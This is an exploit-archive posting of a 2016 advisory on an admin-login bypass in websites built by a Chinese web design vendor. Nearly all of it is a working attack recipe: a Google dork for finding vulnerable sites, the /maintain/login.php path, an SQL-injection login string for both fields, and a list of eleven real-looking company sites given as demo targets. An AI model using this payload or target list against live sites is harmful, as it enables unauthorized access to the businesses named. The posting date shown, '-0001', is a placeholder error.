Home / os / win10

Foshan Nanhai Dachang shelf Co. Bypass adminpage Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Foshan Nanhai Dachang shelf Co. bypass adminpage Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------In The Name Of God------------------------| |[+] Exploit Title: Foshan Nanhai Dachang shelf Co. bypass adminpage Vulnerability |[+] Exploit Author: Ashiyane Digital Security Team |[+] Vendor Homepage: http://www.hotlon.com/ |[+] Google Dork : intext:"网站设计:火龙科技" |[+] Tested on: Windows 10 && Google Chrome && Mozilla Firefox |[+] Date: 2016 29 October |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Then Choose a Target and put this after URL : /maintain/login.php |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] And fill username and password like the information below : |[+] Username : '=' 'or' |[+] Password : '=' 'or' |[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] |[+] Demos : |[+] http://www.blueambre.com/maintain/login.php |[+] http://www.dcshelf.com/maintain/login.php |[+] http://www.pwceramic.com/maintain/login.php |[+] http://www.diamond.cn/maintain/login.php |[+] http://www.chuangyizhongxin.org/maintain/login.php |[+] http://www.china-yuxi.cn/maintain/login.php |[+] http://www.wldmart.com/maintain/login.php |[+] http://www.gdjuying.com/maintain/login.php |[+] http://www.chuangyizhongxin.org/maintain/login.php |[+] http://www.ccjjt.cn/maintain/login.php |[+] http://www.cimcpark.com/maintain/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : modiret |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>

 

TOP